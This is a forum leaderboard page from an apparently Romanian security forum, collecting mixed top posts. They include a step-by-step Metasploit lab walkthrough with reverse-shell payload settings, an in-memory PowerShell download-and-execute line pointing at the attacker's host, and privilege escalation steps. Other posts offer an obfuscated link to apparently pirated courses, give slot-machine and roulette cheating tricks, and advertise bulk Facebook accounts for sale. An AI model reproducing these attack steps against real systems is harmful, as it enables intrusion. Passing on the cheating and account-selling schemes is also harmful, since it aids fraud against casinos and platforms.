Leaderboard

Popular Content

Showing content with the highest reputation on 06/08/17 in all areas

  1. Hi, if anyone needs the entire collection, here is the link: aHR0cHM6Ly9tZWdhLm56LyMhQjNoU0ZBUUEhRjRwMFZWYU9qM2hrRy1Ub1NVQ2FzemNZeGw2S2ZsbVB2eHQ2R0M0cTRmOA== PS: I agree with what Nytro said. The only reason for posting the entire collection is that I want to help the community, and especially the ones that cannot afford the money yet. I am posting the link for a definite amount of time and then it will disappear. The link is base64, for those who do not know. By the way, Vivek's English is OK (believe me, others are far worse at English than he is). Have fun!
    3 points
  2. There will be no tomorrow for you here. Good evening to you too. Permanent ban.
    3 points
  3. The current Android sensor security model either allows only restrictive read access to sensitive sensors (e.g., an app can only read its own touch data) or requires special install-time permissions (e.g., to read microphone, camera, or GPS). Moreover, Android does not allow write access to any of the sensors. Sensing-based security and non-security applications, therefore, crucially rely upon the sanity of the Android sensor security model. In this paper, we show that such a model can be effectively circumvented. Specifically, we build SMASheD, a legitimate framework under the current Android ecosystem that can be used to stealthily sniff as well as manipulate many of the Android’s restricted sensors (even touch input). SMASheD exploits the Android debug bridge functionality and enables a malicious app with only the INTERNET permission to read, and write to, multiple different sensor data files at will. SMASheD is the first framework, to the best of our knowledge, that can sniff and manipulate protected sensors on unrooted Android devices, without user awareness, without constant device-PC connection and without the need to infect the PC. Download: https://we.tl/mfoEtoz63x
    2 points
  4. Video Download Test it in VM !!!
    1 point
  5. 5000 idiots who post cat pictures, are 50 years old, jerk off and burp beer are of no use to you. You need them by niche. Do you have 5000 friends who are Forex traders? Yes, then you have something to use them for. For example, I gathered ~2000 who are only poker players (+/- other gambling games). It is very hard to get 5000 from a single niche; it takes much longer than 3 months, plus some of them report you and you have to recognize all of them, because it shows you pictures of them, otherwise it deletes your account after a while. There are also Facebook groups whose purpose is for others to add you to their list, something like add-me.
    1 point
  6. Hi brother, can you please upload the iOS Pentesting, Log File Analysis, Real World Pentesting and PowerShell courses of Pentester Academy on Mega? Many, many thanks in advance.
    1 point
  7. Step by step Metasploit walkthrough

     Usually, the ultimate goal is to get a root shell on the target machine, meaning you have total control over that machine. I will demonstrate step by step how to obtain a root shell on the Metasploitable 3 virtual machine using Metasploit. You will see that hacking is not always straightforward and, more often than not, you need to start again or find alternative solutions. To start, I booted the freshly created Metasploitable 3 VM and logged in as the vagrant user. Let's go.

     Step 1: Reconnaissance

     Before actually hacking your way in, you need to find more information about your target. You have to find out the IP address, running services and possible vulnerable services to choose your attack vector. Let's start with a simple netdiscover scan to find the IP address of our target. To do so, just type netdiscover in your terminal.

     I know 192.168.0.149 is my own address, so the IP address of my host should be 192.168.0.206.

     Note: as I wrote this blog post over a longer period, the IP address of the target machine used later in this blog post can vary from 192.168.0.205 to 192.168.0.206.

     Let's continue with an Nmap scan to find running services:

         nmap -sV 192.168.0.206

     We find an Apache web server running on port 8022. Let's look into that. Open Firefox and enter the IP address + the port: 192.168.0.205:8022. We see that Desktop Central 9 software is running on port 8022. A quick Google search tells us there is an exploit available! Bingo!

     Step 2: Exploit a service to get a shell

     Now that we have identified a vulnerable service and an available exploit, it's time to exploit the machine. Start Metasploit by running msfconsole in the terminal or click the shortcut. You can find the path for the exploit we found above by entering:

         search ManageEngine

     After executing the search command, we find the ManageEngine Desktop Central 9 exploit we've found via Google. To start using the exploit, type the path as highlighted in the previous screen. You can use tab for autocomplete.

         use exploit/windows/http/manageengine_connectionid_write

     Now the exploit is loaded. Personally, I always run show options to see which settings are available and which are required. We see 3 required settings here:

       - RHOST: the target address. This will be the IP address of our target host, 192.168.0.206.
       - RPORT: the target port. During our Nmap port scan, we found the service running on 8022.
       - TARGETURI: the path for the Desktop Central software. Leave this at the standard setting.

     To set your own settings, you need to execute set SETTING value, e.g.:

         set RHOST 192.168.0.206
         set RPORT 8022

     Understanding the difference between the concepts vulnerability, payload and exploit is important. The payload is the actual code you wish to execute, whilst the exploit is a way to deliver the payload. A vulnerability is a weak spot in the system that allows the exploit to work. If you take the analogy of a rocket, the rocket is the exploit whilst the warhead is the payload, delivering the actual damage.

     Now that we have set up the exploit, we need to attach a payload to it. Usually, our payload is spawning a reverse shell to us, allowing us to interact with the target system. This means we are going to execute specific code on the target machine that will set up a shell (command line) back to us. There are different shells that can be spawned when attacking a Windows machine, such as a Windows command line or a Windows PowerShell. A very interesting payload is the Meterpreter one, because it is capable of so much more than simply spawning a shell.

     Meterpreter is an advanced multi-function payload that is superior to other payloads because, in contrast to other payloads that execute one command (such as adding a user or spawning a shell), Meterpreter can be seen as an interactive shell allowing you to download/upload files, dump password hashes, spawn shells, install backdoors, escalate privileges and so on. Another significant advantage is that Meterpreter fully resides in memory by using DLL injection in existing processes without touching the disk. Furthermore, it can migrate from one process to another to make detection very difficult. To carry out its tasks, it does not create other processes which would be easily picked up by antiviruses or intrusion detection systems.

     To attach a Meterpreter payload to our exploit, use the following command:

         set payload windows/meterpreter/reverse_tcp

     If you run show options again now, you will see that the payload options are visible now:

       - LHOST: the host where the Meterpreter will connect back to. This will be the address of our own Kali VM, 192.168.0.241.
       - LPORT: the port where the Meterpreter will connect back to. Choose any available port you like or leave it on 4444.

     Set our listen address to our own address:

         set LHOST 192.168.0.241

     We're set to fire the exploit. Simply type:

         exploit

     As shown on the screenshot below, you see the exploit worked and the payload was activated and provided us with a Meterpreter shell. To check our current privilege, type getuid. Unfortunately, we only have a lower privilege shell.

     Because we only have a lower privilege shell with limited access, to fully compromise the machine we will need to escalate our privileges. There are a number of options available, but always try the easy way first. Execute getsystem to have Meterpreter try a few tricks up its sleeve to attempt automated privilege escalation. Unfortunately, it didn't work this time. To spawn a local shell (in this case Windows Command Line), just type shell.

     A very powerful Windows privilege escalation framework is PowerSploit, written in PowerShell. We downloaded and extracted the zip file on our Desktop in a folder PowerSploit. We will start a web server with PowerShell, so we can easily call them via our Meterpreter shell. Navigate to the unzipped folder and start a web server via the following command:

         python -m SimpleHTTPServer

     Let's return to our Meterpreter session. It is possible to spawn a PowerShell shell within Meterpreter, but it's far easier to load scripts such as PowerSploit if you immediately spawn a reverse PowerShell with the payload. To do so, we will exit the Meterpreter session and add a PowerShell payload instead of a Meterpreter payload to our exploit by entering the command below. Quickly check show options to verify if the listen address is still correct.

         set payload windows/powershell_reverse_tcp

     And we have a PowerShell session! You can ignore the Invoke-Expression errors.

     This is where it gets a bit more advanced. We cannot just download PowerSploit to our target system, as this will more than likely raise red flags with antivirus systems. To avoid this, we will directly download the script from the web server we just created and execute a PowerSploit script in memory without touching the disk. We are going to use PowerUp.ps1, which is a specially crafted PowerShell script that is part of the PowerSploit framework. To download the script into memory, execute the following command in PowerShell:

         IEX(New-Object Net.WebClient).DownloadString("http://192.168.0.241:8000/Privesc/PowerUp.ps1")

     Next, we execute a function from the script called Invoke-AllChecks, which will check the target host for attack vectors for privilege escalation. To make it easier to read, we will output the result to a file named allchecks.txt:

         Invoke-AllChecks | Out-File allchecks.txt

     To check out the results, open a new terminal and launch a new instance of Metasploit and get the Meterpreter shell up again (we should have saved our previous session instead of terminating it). To do so, repeat the steps as you did last time but choose another listening port, as we are already using 4444 in our PowerShell session (see left terminal window on the screenshot below). Now we have two shells running on the same target host, a PowerShell and a Meterpreter shell. To download the allchecks.txt file, execute download allchecks.txt with Meterpreter. Download a copy of the allchecks.txt here.

     As you can read in the allchecks.txt file, the script checks the target system for privilege escalation vulnerabilities such as unquoted service paths, hackable DLL locations, unattended install files, etc. Let's focus on these unquoted service paths and service executable and argument permissions. Basically, these are improperly configured service paths where custom commands can be added. As services are run by the system user, this would mean that our custom command is also executed as the system user. Nice! The catch, however, is that you also need improperly configured write access rights to these services to add your custom command.

     PowerSploit makes it easy for you and gives you the abuse functions you need to execute to exploit a possible vulnerability. For example, for abusing the service Jenkins, we would need to execute the following command: Install-ServiceBinary -Name 'jenkins'. Unfortunately, after executing all given commands, we were not able to abuse a function due to no write access rights.

     Maybe PowerSploit didn't catch all unquoted service paths. Let's check manually in our open Meterpreter shell. First get a Windows Command Line by executing shell. Execute the following command:

         wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

     Using this method, we find 4 possible vulnerable services. One of these services, OpenSSHd, was not in the list of PowerSploit. Let's try to exploit this service. Attempt exploitation of the service OpenSSHd by executing the following command in PowerShell. We see that the PowerShell session closed immediately. With some luck, the command was installed anyway. According to the Readme of PowerSploit, when using the command below the user John with password Password123! should be added to the administrators group.

         Install-ServiceBinary -Name 'OpenSSHd'

     Let's try to restart the service with net stop OpenSSHd and net start OpenSSHd and see if our command kicks in. Unfortunately, we have no access to start or stop a service. I also quickly verified if the user John was added, but no luck.

     There is another way to restart a service, and that's forcing a reboot of our target host. Let's run Nmap to see if the host is vulnerable to some attacks to force a reboot. We found a vulnerability to the MS12-020 bug, exploited by CVE-2012-0002. Type back in the Metasploit console where our PowerShell just closed down and follow the same procedure as last time: search for the exploit, configure the exploit and execute it. This exploit sends a sequence of specially crafted RDP packets to an affected system, causing it to crash and reboot. (Make sure to watch your Metasploitable 3 VM when launching this exploit.)

     Your active Windows Command Line shell will have died because of the reboot. When the machine is back online, simply type exploit again to reconnect to the Meterpreter shell. Spawn a Windows Command Line by executing shell and check with net users if our exploit worked.

     It worked! We have created a new user named John, which is part of the Administrators group. We know from the PowerSploit Readme that his password is Password123!.

     Next step is to actually log in with our new Administrator and get a root shell. Let's try the famous PSExec exploit with our new Administrator details.

     Another cool trick is spawning a remote desktop. It could be very useful for enumeration of the box or disabling firewall (rules) if PSExec should not work.

     Source: https://www.zero-day.io/metasploitwalkthrough/
    1 point
  8. An application built by IT specialists from Cluj, used by NASA on the International Space Station

     Several IT specialists from Cluj, developers of a backup application, have got their product onto the International Space Station itself, after the Americans at NASA bought 20 licences of their software, which is now already at its sixth version, with sales all over the world, News.ro writes.

     NASA purchased 20 licences of the Backup4all software, an application developed by a team of programmers from Cluj who own the company Softland. Since May, the application has been used on the International Space Station for the backup activities carried out by the agency. A licence for this application costs 49.99 dollars, but because NASA bought a larger quantity of licences, it also received a discount, so the total price was 770 dollars. Also, because it is used in an environment with no internet connection, the application had to be modified.

     "In January this year we received an e-mail from NASA in which they told us they would like to install Backup4all in a very secure environment, without internet access. They explained that our activation method would not work in their environment, and that is when we learned that they wanted to install the application on the International Space Station. A whole month of tests and configurations for what they needed followed, and on 31 May it started being used. So it now runs on eight laptops on the International Space Station," explained Lóránt Barla, on behalf of Softland.

     The Cluj team, who have reached the sixth version of Backup4all, explained that they still keep in touch with the people at NASA in case they need help on the support side.

     "The people at NASA bought the application from our website like any normal customer. We didn't even know. Maybe we have other equally important customers, but we don't know. They would have had other options, because competition in the backup space is fairly strong. Why did they choose our application? Because it seemed to them the best solution that they could configure to their needs. As for our customers at NASA, we still communicate with them professionally, and if they need support they can count on our help. But, as a rule, Backup4all is configured and performs its backups automatically, with no need for further interaction with the developers," said Lóránt Barla.

     As a company, Softland has been operating since 1999, initially doing outsourcing work. Since 2002, however, the team has focused on developing and selling its own software. Softland currently has 13 employees, who also handle marketing, customer relations and sales.

     Source: http://www.digi24.ro/stiri/externe/o-aplicatie-realizata-de-it-istii-din-cluj-folosita-de-catre-nasa-pe-statia-spatiala-internationala-737922
    1 point
  9. Published on 3 May 2017. We take a look into the malware Gatak, which uses WriteProcessMemory and CreateRemoteThread to inject code into rundll32.exe. Many thanks to @_jsoo_ for providing the sample! Follow me on Twitter: https://twitter.com/struppigel
     Gatak VirusBtn article: https://www.virusbulletin.com/virusbu...
     Sample: https://www.hybrid-analysis.com/sampl...
     API Monitor: http://www.rohitab.com/apimonitor
     Process Explorer: https://technet.microsoft.com/en-us/s...
     x64dbg: http://x64dbg.com/
     HxD: https://mh-nexus.de/en/hxd/
    1 point
  10. I have to disagree with you. With slot machines, normally, "by law", if you have a gaming hall with more than 5 machines, like a betting shop, you are obliged to run at a ratio of 60% player winnings to 40% gaming hall, and if you are registered as a casino you are obliged to run at 70% player winnings and 30% for you. The big trick with the machines is that jackpot everyone stares at, but nobody understands that it is actually the catch: for the jackpot to work and grow, all the machines have to be linked to it, and the trace of the percentage gets lost among them. I can put, for example, 10 million into machine no. 3 and you can win from machine 5, and then you ask yourself why the machine did not give you 7 million back, since it has the 70% ratio. Well, it did not give it to you because they are linked together and the trace of the percentage gets lost among them.

      As for tricks, there were plenty for that "strawberries" game: if, at the moment it gave you 3 strawberries on the screen, you had your phone on the side of the machine next to the speaker, and next to the speaker there is a sensor, you had a 90% probability of getting the maximum bonus spins, that is 15, as it was back then! Not to mention the ones in the West where you pressed the button for the money to drop and you could actually have one euro in the "bank": if you had a 1 metre tape measure cut in 3, that is 3.33 centimetres each, stuck one on top of the other and wrapped in black insulating tape, you could push that tape measure into that slot and press the button to pay out that euro; then the machine no longer knew how much money you had in the bank, because you were actually jamming the reader, and the machine knew it had to give you money but not how much, and as a rule it gave you the first two boxes, that is the one with 5-10-20 cents and the second one with 50 cents and 1 euro. And many others.

      As for roulette, there were many tricks here too (I do not know the percentages and I will not guess them, because I am not informed about that). But most of them actually came down to a bit of inside collusion. The one with the magnet placed on top of the glass exactly in the middle when you played the small series, and placed on the side opposite the ball at the moment of launch. The one with the phone on vibrate stuck to the box that opened for the roulette to be read. There was also a bug where, if you played red/black, regardless of the result, before the roulette announced red or black you had to quickly press re-bet (same bet) and it doubled your amount (this trick worked in the period 2011-2013 on R.Franco type roulettes). So tricks exist and still exist. My advice is not to play, and if you do play you should go to a casino like Maxbet or Million, where nobody bothers to fleece you of 3-4-5 million, because those people make maybe a hundred thousand a day!
    1 point
  11. On Red Hat, on most subdomains, if you were not logged in and visited a page that required login, the redirect went through service-now, which had a vulnerable GET parameter. I could not find the exact picture any more, so I took a screenshot from the PoC video. On sap.com it was likewise an XSS via GET; I will post the picture tonight when I get home. Both were reported and fixed, and as a reward I got hall of fame on both. At Red Hat they made me choose which one I wanted to be in, ServiceNow or Red Hat😂
    1 point
  12. DSploit Android Toolkit for Security Testing

      April 20th, 2014, Mourad Ben Lakhoua

      dSploit is a very comfortable tool that you can install on Android to run a pentest or network security assessment. The toolkit allows fingerprinting the remote operating systems and identifying different hosts, scans the network for system vulnerabilities and performing MITM to sniff sensitive information such as user’s password.

      The features included in dSploit are:

        - WiFi Scanning & Common Router Key Cracking
        - Deep Inspection
        - Vulnerability Search
        - Multi Protocol Login Cracker
        - Packet Forging with Wake On Lan Support
        - HTTPS/SSL Support ( SSL Stripping + HTTPS -> Redirection )
        - MITM Real-time Network Stats
        - MITM Multi Protocol Password Sniffing
        - MITM HTTP/HTTPS Session Hijacking
        - MITM HTTP/HTTPS Hijacked Session File Persistence
        - MITM HTTP/HTTPS Real-time Manipulation

      MITM module screenshot from dSploit

      The toolkit will help security officer or penetration tester to demonstrate how it is possible to exploit vulnerabilities and take control on targeted systems. The team have officially announced that they have a new nightly builds that you can download over this link: http://update.dsploit.net/nightly
    1 point
  13. Fern Wifi Cracker 1.45 Released with Cookie Hijacker

      Fern Cookie Hijacker is a new feature added in Fern Wifi Cracker 1.45. It is a wifi-based session hijacking tool able to clone remote online web sessions by sniffing and capturing wireless cookie packets from remote hosts by intercepting reachable wireless signals. It is capable of decrypting WEP encrypted packets on the fly to process session cookies transmitted over the air. Fern Cookie Hijacker comes with smart integrated code to detect and intercept cookie packets; unlike some cookie detection engines, Fern Cookie Hijacker does not wait to collect complete cookie acknowledgement during the initial authentication process, but pulls cookies and associates them with their hosts as they are transmitted over the wireless connection. It also forges to correctness values that are not captured, e.g. (expiry, isSecure).

      Download Fern Wifi Cracker 1.45

      Source: Fern Wifi Cracker 1.45 Released with Cookie Hijacker | Tools Yard - The Hacker News
    1 point
  14. I use eBay on a daily basis, Amazon rarely. What is stopping you from placing the order?
    0 points
  15. OK, note that you triple-posted. Let's stop spamming the man's topic. If he is interested, I suppose he will contact you, right? Your English is terrible; get it up to scratch if you live in the UK and stop hanging around only with Romanians.
    -1 points
  16. Hi. I am selling Facebook accounts with 5000 friends. Accounts less than 3 months old cost: 5000 friends - 10 euro. Accounts more than 3 months old: 5000 friends - 15 euro. The friends are Romanian. Anyone interested, send me a message.
    -1 points
  17. He has a reputation of -16 ... what did you expect?
    -3 points